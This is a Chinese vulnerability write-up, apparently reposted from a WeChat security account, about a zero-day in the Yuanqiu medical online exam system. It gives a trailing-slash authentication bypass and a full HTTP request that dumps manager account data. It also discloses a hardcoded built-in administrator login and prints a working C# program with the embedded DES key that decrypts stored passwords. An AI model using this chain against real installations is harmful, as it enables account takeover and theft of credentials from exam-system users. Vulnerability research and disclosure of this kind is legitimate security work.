0day | 远秋医学在线考试系统任意用户登录漏洞分析

前言

漏洞影响版本 <= V 3.26.9

鉴权绕过

存在绕过的路径 YQExam.Web.Filter.AuthorValid.AuthorValid

如果路径以".aspx",".ascx",".ashx"结尾会进入权限判断，但"/Default.aspx","Register.aspx"等除外

if (absolutePath.EndsWith(".aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith(".ascx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith(".ashx", StringComparison.CurrentCultureIgnoreCase))
{
    if (absolutePath.EndsWith("/Default.aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith("/Register.aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith("/MediaFile.aspx", StringComparison.CurrentCultureIgnoreCase) || absolutePath.EndsWith("/Login.aspx", StringComparison.CurrentCultureIgnoreCase))
    {
        return;
    }

这里可以结尾使用"/"可以绕过

权限绕过读取密码

密码读取路径： YQExam.Web.Manager.Ajax.User

这里通过oper参数值来确定操作类型，这里主要是getManagerList和getUserList来获取用户信息

这段代码判断当前登录状态，如果不是系统管理员登录状态，则只能获取普通管理员的信息

if (!ManagerBll.IsAdmin(PageClass.getCurrAdminId("")))

{
    text2 += " AND Admininfo.intAdminType=0";

}

构造poc

POST /Manage/Ajax/User.ashx/ HTTP/1.1
Host: 127.0.0.1:8002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

oper=getManagerList&name=&code=&depart=&page=1&rows=15

密码解密

用户登录时会判断用户类型

由于我这是代码是3.25版本的，在该版本之前代码中有个内置账号YuanqiuExam/1398311407513708315661会直接以系统管理员权限登录

登录主要代码，发现是密码是DES加密

dataTable = SqliteHelper.Query("SELECT * FROM  AdminInfo WHERE rn                        IFNULL(lngDeleteOperatorId,0) = 0 AND LOWER(strOperatorName)=LOWER(@strOperatorName) AND strPassword=@strPassword LIMIT 0,1", new SQLiteParameter[]
        {
                    new SQLiteParameter("@strOperatorName", strAdminName),
                    new SQLiteParameter("@strPassword", DES.EncryptPassword(strPassword))
                    });

跟进DES加密文件发现已经写好了加密和解密的函数，直接用就行

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace YQExam.Common.Crypt
{
  
  public sealed class DES
  {

    static void Main(string[] args)

        {

            // Console.WriteLine(DES.EncryptPassword("kw666666"));
            Console.WriteLine("输入密文:");
            string text = Console.ReadLine();
            Console.WriteLine(DES.Decrypt1(text, "df6dsf5s", 69));
        }
    private static string Decrypt1(string strData, string strKey, int mintSubKey)
    {
      while (strKey.Length < 8)
      {
        strKey += "&#x0;";
      }
      string result;
      try
      {
        DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
        byte[] bytes = Encoding.Default.GetBytes(strKey);
        byte[] array = new byte[strData.Length / 2];
        for (int i = 0; i < strData.Length / 2; i++)
        {
          int num = Convert.ToInt32(strData.Substring(i * 2, 2), 16);
          array[i] = (byte)(num ^ mintSubKey);
        }
        MemoryStream memoryStream = new MemoryStream();
        CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(bytes, bytes), CryptoStreamMode.Write);
        cryptoStream.Write(array, 0, array.Length);
        cryptoStream.FlushFinalBlock();
        cryptoStream.Close();
        result = Encoding.Default.GetString(memoryStream.ToArray());
      }
      catch
      {
        result = "";
      }
      return result;
    }
    private const int intSubKey = 63;
  }
}

原文始发于微信公众号（安全绘景）：0day | 远秋医学在线考试系统任意用户登录漏洞分析